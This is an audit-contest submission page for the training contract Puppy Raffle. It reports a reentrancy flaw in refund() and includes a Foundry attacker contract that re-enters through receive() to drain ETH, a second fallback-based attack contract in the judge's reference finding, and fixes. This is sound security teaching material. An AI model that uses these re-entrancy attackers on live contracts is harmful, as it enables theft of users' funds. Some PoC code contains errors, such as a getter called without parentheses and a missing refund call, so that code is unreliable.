Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Reentrancy in PuppyRaffle.refund() Allows Fund Drainage

a01278306088

Summary

The refund() function in PuppyRaffle.sol is vulnerable to a reentrancy attack. It sends ETH to the caller before updating the internal state (players[playerIndex] = address(0)). A malicious contract can exploit this by re-entering the function through its receive() fallback, allowing it to claim multiple refunds for a single entry and drain the contract's entire balance.

Description

The refund() function violates the Checks-Effects-Interactions pattern by executing an external call before updating state:

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
payable(msg.sender).sendValue(entranceFee); // ← External call FIRST
players[playerIndex] = address(0); // ← State update AFTER
}

This allows a malicious contract to re-enter refund() via its receive() fallback before the state is updated.

Risk

Severity: High
Likelihood: High
Impact: Critical

An attacker can:

  1. Deploy a contract with a receive() fallback

  2. Enter the raffle once

  3. Call refund() and re-enter via the fallback

  4. Repeat to drain all funds

This results in complete loss of funds for all legitimate players.

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
import {Test, console} from "forge-std/Test.sol";
import {PuppyRaffle} from "../src/PuppyRaffle.sol";
contract ReentrancyAttacker {
PuppyRaffle public raffle;
uint256 public refundCount;
uint256 public playerIndex;
constructor(address _raffle, uint256 _playerIndex) {
raffle = PuppyRaffle(_raffle);
playerIndex = _playerIndex;
}
function attack() external payable {
address[] memory players = new address[](1);
players[0] = address(this);
raffle.enterRaffle{value: raffle.entranceFee()}(players);
raffle.refund(playerIndex);
}
receive() external payable {
if (refundCount < 5) {
refundCount++;
raffle.refund(playerIndex);
}
}
}
contract ReentrancyExploitTest is Test {
PuppyRaffle public raffle;
ReentrancyAttacker public attacker;
uint256 entranceFee = 1e18;
address feeAddress = address(99);
uint256 duration = 1 days;
function setUp() public {
raffle = new PuppyRaffle(entranceFee, feeAddress, duration);
vm.deal(address(raffle), 100e18);
}
function testReentrancyDrainsFunds() public {
attacker = new ReentrancyAttacker(address(raffle), 0);
vm.deal(address(attacker), entranceFee);
uint256 balanceBefore = address(raffle).balance;
attacker.attack{value: entranceFee}();
uint256 balanceAfter = address(raffle).balance;
assertGt(attacker.refundCount, 1, "Reentrancy failed");
assertLt(balanceAfter, balanceBefore - entranceFee, "Funds drained");
console.log("✅ REENTRANCY ATTACK SUCCESSFUL");
console.log("Attacker refunded", attacker.refundCount, "times");
console.log("Funds drained:", balanceBefore - balanceAfter);
}
}

Run: forge test --match-contract ReentrancyExploitTest -vv

Expected Output:

✅ REENTRANCY ATTACK SUCCESSFUL
Attacker refunded 5 times
Funds drained: 5000000000000000000

Recommended Mitigation

Apply Checks-Effects-Interactions by updating state BEFORE external calls:

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
players[playerIndex] = address(0); // Update state FIRST
payable(msg.sender).sendValue(entranceFee); // External call LAST
}

Why This Works: Setting players[playerIndex] = address(0) before sending ETH ensures the require check fails on re-entry.

Alternative: Use OpenZeppelin's ReentrancyGuard with nonReentrant modifier.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 7 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!